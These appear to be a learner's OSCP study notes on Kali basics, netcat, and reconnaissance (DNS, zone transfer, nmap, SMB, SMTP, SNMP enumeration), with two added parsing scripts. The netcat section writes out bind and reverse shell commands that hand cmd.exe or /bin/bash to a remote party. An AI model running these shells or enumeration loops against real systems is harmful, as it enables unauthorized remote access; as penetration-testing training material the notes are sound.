My OSCP notes (PWK videos)
.......... Finding files on Kali Linux ..........
which === returns the pathname of the file (or link) that would be executed in the current environment, i.e. the first match on PATH
find / -name google -exec file {} \; === find is the more aggressive tool because it walks the live filesystem; it is the best choice for searching any file or directory by name, and -exec runs a command (here file) on every match
locate === writes file names matching at least one of the PATTERNs to standard output, one per line; it reads a prebuilt database, so run updatedb first for fresh results
.......... Managing Kali Linux services: changing the Kali password from the shell ..........
passwd === changes the current user's Kali Linux password
.......... Starting the SSH service (for remote connections) ..........
service ssh start === starts the Secure Shell daemon so the box accepts remote connections
netstat -antp | grep sshd === confirms sshd is listening (grep filters the netstat output down to the sshd lines)
.......... Starting the HTTP service (Apache2) ..........
service apache2 start === starts the Apache2 web server
.......... Checking the SSH and HTTP (Apache2) services from the shell ..........
netstat -antp | grep apache2
.......... Service management with the init scripts ..........
# start any service, such as apache2 or ssh, through its init script
/etc/init.d/ssh start === start the ssh service
/etc/init.d/apache2 start === start the apache service
.......... Service boot persistence ..........
# make a service such as apache2 or ssh start automatically at boot
update-rc.d ssh enable
update-rc.d apache2 enable
.......... Bash (Bourne Again SHell) ..........
# bash is the scripting shell used for the scripts in these notes
.......... How to find website subdomains ..........
# wget downloads the website's index page
wget www.cisco.com
# grep keeps the lines containing href=, cut -d"/" -f3 takes the host part of each absolute URL
cat index.html | grep "href=" | cut -d"/" -f3 | grep cisco\.com | more
# sort -u removes the duplicates and leaves one hostname per line
cat index.html | grep "href=" | cut -d"/" -f3 | grep cisco\.com | sort -u
# resolve the hosts; the "has address" lines carry the IPv4 address in field 4
host www.cisco.com
host www.cisco.com | grep "has address" | cut -d" " -f4
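Added example (not from the PWK notes or the original post): a POSIX sh script that does the same href-to-hostname extraction as the cut pipeline above, but goes beyond it by skipping relative links, accepting protocol-relative // links, dropping any :port and filtering to one domain. The HTML and the example.com hostnames are constructed.

```shell
#!/bin/sh
# Added example, not from the PWK notes: pull the unique hostnames out of a
# saved HTML page. Same job as the grep/cut pipeline, but it also skips
# relative links (href="/about" has no host), accepts protocol-relative
# //host links, drops any :port, and keeps only hosts under one domain.

# Constructed stand-in for the index.html that wget saved (not a real page).
SAMPLE_HTML='<a href="https://www.example.com/">Home</a>
<a href="http://tools.example.com:8080/downloads">Tools</a>
<a href="/about">About</a>
<link href="//static.example.com/site.css" rel="stylesheet">
<a href="https://www.example.com/contact">Contact</a>
<a href="https://partner.example.net/">Partner</a>'

# extract_hosts FILE DOMAIN -> sorted unique hostnames equal to or under DOMAIN
extract_hosts() {
    file=$1
    domain_re=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape dots for the regex
    # 1. every href value; 2. keep absolute (http:, https:) or // links and
    #    capture the host up to the next / or :; 3. keep hosts under DOMAIN
    grep -o 'href="[^"]*"' "$file" \
        | sed -n 's#^href="\(https\{0,1\}:\)\{0,1\}//\([^/:"]*\).*#\2#p' \
        | grep -E "(^|\.)${domain_re}\$" \
        | sort -u
}

# run_on_sample DOMAIN -> extract_hosts over the constructed page
run_on_sample() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_HTML" > "$tmp"
    extract_hosts "$tmp" "$1"
    rm -f "$tmp"
}

run_on_sample example.com
```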
.......... How to ping sweep a range from /bin/bash ..........
#!/bin/bash
# one ping per address 192.168.31.200-210
for ip in $(seq 200 210); do
ping -c 1 192.168.31.$ip
done
#!/bin/bash
# same sweep, but keep only the replying addresses: "64 bytes from 192.168.31.200: ..." -> field 4 -> strip the trailing colon
for ip in $(seq 200 210); do
ping -c 1 192.168.31.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1
done
.......... Netcat ..........
netcat is a network utility that can read and write over both TCP and UDP
netcat is used to check whether a port is open or closed and to read its banner
rdesktop -u <username> -p <password> <ip> === (separate tool) opens an RDP session to <ip> with the given credentials
.......... Banner grabbing using netcat ..........
connect to any port with netcat === nc -nv <ip> <port>
nc -nv 192.168.0.1 80
.......... Netcat for chatting or file transfer ..........
<target system> nc -nvlp 4444 === listen on port 4444 (-l listen, -p port, -n no DNS, -v verbose)
<attacker system> nc -nv <target ip address> 4444 === connect to that listener; whatever is typed on either side appears on the other
.......... How to transfer a file using netcat ..........
nc -nv 192.168.0.21 4444 < /root/share/windows/binary/wget.exe === file sharing command: the file is fed to the connection on stdin, and the listening side redirects its stdout to a file to save it
.......... Bind shell: the victim shares its Windows command prompt on a listening port ..........
victim side (Windows PC): nc -nvlp 4444 -e cmd.exe === listens and hands cmd.exe to whoever connects
attacker side (Linux PC): nc -nv 192.168.0.1 4444
# once connected, commands typed here run on the Windows machine
.......... Reverse shell (the bind shell in the other direction) ..........
with a reverse shell the listener is on the attacker's side and the target connects back to it
Windows: nc -nvlp 4444
Linux system: nc -nv <ip> 4444 -e /bin/bash === the listener on Windows now gets a /bin/bash terminal
.......... Secure bind shell using ncat ..........
# with ncat's --ssl option the shell traffic is encrypted on the wire
target side: ncat -nvlp 4444 -e cmd.exe --ssl
attacker side: ncat -v 192.168.43.21 4444 --ssl
.......... Information gathering ..........
1) Active info gathering === touches the target directly: ping, traceroute
2) Passive info gathering === collects information about the target from publicly available data, e.g. search engines
.......... Google searching for information gathering ..........
site: === restricts results to one domain, which is useful for finding subdomains, e.g. site:"google.com"
-site: === excludes a domain from the results, e.g. -site:"www.google.com" (combined with site:"google.com" this leaves the other subdomains)
filetype: === restricts results to a file type such as pdf or ppt, e.g. filetype:ppt "penetration testing"
site:"microsoft.com" filetype:pdf "penetration testing"
.......... Google hacking ..........
intitle: === matches words in the page title, for pinpointing a particular application or page
intitle:"wifi drivers for windows 7"
inurl: === matches text in the URL, e.g. a particular .html or .php path
inurl:"control/userimage.html"
intext: === matches words in the page body text
.......... Google Hacking Database (GHDB) ..........
www.exploit-db.com === hosts the GHDB of search queries, alongside its archive of published exploits and payloads
.......... DNS enumeration ..........
DNS enumeration === discovering the name servers, mail servers and IP addresses of a domain
name servers === host -t ns www.google.com
mail servers === host -t mx www.google.com
IP address === host www.google.com
.......... Forward DNS lookup ..........
discovering hostnames and their IP addresses with a bash script
list.tst === a wordlist of candidate hostnames (www, admin, ftp, etc.), one per line, saved as list.tst
then run the bash script dns.sh:
#!/bin/bash
# try every name in the list as a subdomain and print the hostname and address (fields 1 and 4 of "X has address Y")
for name in $(cat list.tst); do
host $name.google.com | grep "has address" | cut -d" " -f1,4
done
.......... Reverse DNS lookups ..........
discovering hostnames from a range of IP addresses with a bash script
#!/bin/bash
# a reverse lookup answers "X.in-addr.arpa domain name pointer hostname.", so match on that and keep fields 1 and 5
for ip in $(seq 1 100); do
host 192.168.43.$ip | grep "domain name pointer" | cut -d" " -f1,5
done
.......... Zone transfer attack against a name server ..........
host -l <domain name> <name server> === host -l asks the given name server for the whole zone
zone transfer attack === host -l gpaurai.ac.in ns67.domaincontrol.com (the name server can be given by name or by IP, e.g. 172.217.160.238)
Bash script (the domain is passed as $1):
#!/bin/bash
# "host -t ns domain" prints "domain name server ns.example.", so field 4 is the server; try a transfer from each one
for name in $(host -t ns $1 | cut -d" " -f4); do
host -l $1 $name | grep "has address"
done
.......... Port scanning ..........
scanning TCP and UDP ports with nmap (and netcat)
.......... TCP connect scan ..........
a TCP connect scan attempts the full three-way handshake on every port; when the handshake completes successfully, the port is open
scan a network using netcat:
nc -nvvz -w 1 192.168.43.98 1000-10000 === -z scans without sending data (zero-I/O mode), -w 1 gives each port a 1 second timeout, -vv prints every result
.......... TCP SYN scan ..........
a SYN scan sends only the SYN packet and does not complete the handshake
SYN scans are also used to bypass firewalls
.......... UDP port scan using netcat ..........
nc -unvvz -w 1 192.168.43.98 1000-10000 === -u switches netcat to UDP
.......... Nmap port scanner ..........
nmap manual === man nmap; nmap's own data directory (scripts, service and OS fingerprint databases) is /usr/share/nmap
.......... Accountability for your traffic ..........
.......... Network sweeping using nmap ..........
-oG <file> === saves the output in grepable format to a file on your computer
--top-ports <n> === scans only the n most common ports, e.g. --top-ports 20
-p === port or port range to scan
-sn === host discovery (ping sweep) only, no port scan
cut -d" " -f2 === cuts the IP address out of a grepable "Host: <ip> ()" line
nmap -sn 192.168.43.198 -oG output.txt === ping sweep saved in grepable format (the option needs its leading dash: -oG)
nmap -p 1-1000 192.168.43.198 -oG output.txt === port scan of ports 1-1000 saved in grepable format
grep Up output.txt | cut -d" " -f2 === list the addresses that were up
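Added example (not from the PWK notes): a POSIX sh script with two awk helpers that parse an nmap -oG grepable file, listing the hosts reported Up and every open port with its service, so a finished scan can be triaged without re-running it. The grepable lines it works on are constructed, not real scan output.

```shell
#!/bin/sh
# Added example, not from the PWK notes: parse nmap -oG (grepable) output.
# Grepable lines are tab separated: "Host: <ip> (<name>)\tStatus: Up" for a
# ping sweep, and "Host: <ip> ()\tPorts: <port>/<state>/<proto>//<service>//<version>/, ..."
# for a port scan. The sample below is constructed, not real scan output.

# write_sample -> prints a constructed output.txt in the -oG layout
write_sample() {
    printf '# Nmap 7.94 scan initiated as: nmap -oG output.txt 192.168.31.200-203\n'
    printf 'Host: 192.168.31.200 ()\tStatus: Up\n'
    printf 'Host: 192.168.31.201 ()\tStatus: Up\n'
    printf 'Host: 192.168.31.200 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/open/tcp//http//Apache httpd 2.4.41/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
    printf 'Host: 192.168.31.201 ()\tPorts: 445/open/tcp//microsoft-ds///, 139/filtered/tcp//netbios-ssn///\n'
    printf '# Nmap done -- 4 IP addresses (2 hosts up) scanned\n'
}

# live_hosts FILE -> one IP per line for every host nmap reported as Up
live_hosts() {
    awk -F '\t' '$1 ~ /^Host:/ && $2 == "Status: Up" { split($1, h, " "); print h[2] }' "$1"
}

# open_ports FILE -> "<ip> <port>/<proto> <service>" for every open port
open_ports() {
    awk -F '\t' '
        $1 ~ /^Host:/ {
            split($1, h, " "); ip = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                n = split(substr($i, 8), p, ", ")       # drop "Ports: ", split entries
                for (j = 1; j <= n; j++) {
                    # entry layout: port/state/proto/owner/service/rpcinfo/version/
                    split(p[j], f, "/")
                    if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
                }
            }
        }' "$1"
}

# summarise FILE -> print the live hosts, then the open ports
summarise() {
    echo "Hosts up:"
    live_hosts "$1"
    echo "Open ports:"
    open_ports "$1"
}

scan=$(mktemp)
write_sample > "$scan"
summarise "$scan"
rm -f "$scan"
```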
.......... OS detection and banner grabbing using nmap ..........
-sV === service/version detection (banner grabbing)
-O === OS detection
-A === aggressive scan: OS detection, version detection, script scanning and traceroute are all included in -A
.......... Nmap NSE scripts ..........
/usr/share/nmap/scripts === all the scripts live here: brute force, smb, etc.
.......... SMB enumeration ..........
SMB (Server Message Block) is a client-server protocol for sharing files and printers; it runs directly over TCP on port 445 and over NetBIOS on port 139
smb ports: 139, 445
netbios scanning tool === nbtscan <ip>
nmap -p 139,445 -A <ip> --open === --open displays only the open ports
.......... SMB null session ..........
null sessions are unauthenticated sessions of the Server Message Block (SMB) protocol
rpcclient -U "" <ip> === smb null session command (press Enter at the empty password prompt, or add -N to skip it)
.......... enum4linux ..........
Enum4linux is a tool for enumerating information from Windows and Samba systems
enum4linux -a <target ip>
.......... Nmap SMB NSE scripts ..........
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features.
It allows users to write (and share) simple scripts to automate a wide variety of networking tasks.
ls -l /usr/share/nmap/scripts | grep smb === show the smb scripts in the terminal
ports 139, 445 === smb enumeration ports
nmap -p 139,445 --script smb-enum-users <ip>
.......... SMTP enumeration ..........
SMTP enumeration: the Simple Mail Transfer Protocol is used to send email messages (POP3 and IMAP are the protocols clients use to retrieve them)
smtp runs on port 25
nc -nv <ip> 25
VRFY <user> === this command asks the server whether the mailbox exists, so the reply shows whether the username is valid
.......... SMTP enumeration using bash scripting ..........
cat ram.txt === bob, root, backup (one candidate user per line)
# send VRFY for each user; a 250 or 252 reply means the server recognises the name, 550 means it does not
for user in $(cat ram.txt); do
echo VRFY $user | nc -nv -w 1 192.168.2.19 25 2>&1 | tee -a /root/Desktop/ra | grep -E "^(250|252)";
done
.......... SNMP enumeration ..........
SNMP enumeration: SNMP (Simple Network Management Protocol) is an application layer protocol
that uses UDP to monitor and manage routers, hubs, switches and other network devices on an IP network
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names and devices on a target system
ports: UDP 161 (queries) and 162 (traps)
.......... SNMP MIB ..........
MIB stands for Management Information Base and is a collection of information organized hierarchically
nmap -sU -p 161 --open <ip> === UDP scan showing only open SNMP ports
onesixtyone === an SNMP scanner
onesixtyone -c <communityfile> <hostip> === -c gives a file with community names to try (use -i <hostfile> for a list of hosts)
.......... snmpwalk ..........
snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.
An object identifier (OID) may be given on the command line.
This OID specifies which portion of the object identifier space will be searched using GETNEXT requests.
tool: snmpwalk, e.g. snmpwalk -c <community> -v1 <ip> [OID]
.......... Vulnerability scanning ..........
Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes.
.......... Vulnerability scanning with NSE scripts ..........
nmap -v -p 80 --script all <ip> === runs every NSE script against port 80 (very noisy; pick a category such as vuln for a targeted scan)